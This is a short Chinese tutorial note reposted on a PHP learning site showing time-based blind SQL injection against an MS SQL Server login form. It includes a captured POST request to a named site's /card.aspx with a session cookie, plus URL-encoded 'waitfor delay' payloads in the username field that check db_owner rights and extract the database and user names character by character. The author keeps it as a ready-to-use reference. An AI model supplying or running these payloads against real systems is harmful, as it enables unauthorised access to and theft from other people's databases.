来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 注入的基础知识就不说的了,只是在这里做个简单的笔记,以便之后拿起了就用。01 POST /card.aspx HTTP/1.102 Content-Length: 9603 Content-Type: application/x-www-form-urlencoded04 X-Requested-Wit......
|
注入的基础知识就不说的了,只是在这里做个简单的笔记,以便之后拿起了就用。
01 POST /card.aspx HTTP/1.1
02 Content-Length: 96
03 Content-Type: application/x-www-form-urlencoded
04 X-Requested-With: XMLHttpRequest
05 Cookie: ASP.NET_SessionId=2k32d0nwvrzpbg55qucudt3b
06 Host: www.cunlide.com
07 Connection: Keep-alive
08 Accept-Encoding: gzip,deflate
09 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
10 Accept: */*
11
12 www.2cto.com
cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20 看POST数据,注入是发生在username这里。把username的值URL解码下这样比较清楚点。
1 pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20
2
3 pxnjodhe'; waitfor delay '0:0:5' --
因为延时注入是通过页面返回的时间来判断的,所以当我进行猜解的时候也就是用时间来进行猜解,比如我们可以取出db_name的第一个字符,先转换成ASCII在和数字进行比较(推荐使用<、>),在比较时我们可以用折半法,比如我们先猜解第一个字符是大写字母还是小写字母,就可以用91来做个标准小于91的为大写字母(A-F,或许是_ 、-),大于则反。
下面两个语句为例子:
1 cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if%20(0%3D(SELECT%20IS_MEMBER ('db_owner')))%20waitfor%20delay%20%270:0:11%27%20--%20
2 //判断权限
3 cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if(ascii(substring(db_name(),1,1)))>40%20waitfor%20delay%20%270:0:2%27%20--%20
4 //数据库名
5 cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if(ascii(substring(user_name(),1,1)))>115%20waitfor%20delay%20%270:0:1%27%20--%20
6 //用户名
建议用时但编码状态出问题时,可以试试未编码状态。
如有错误指正下。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
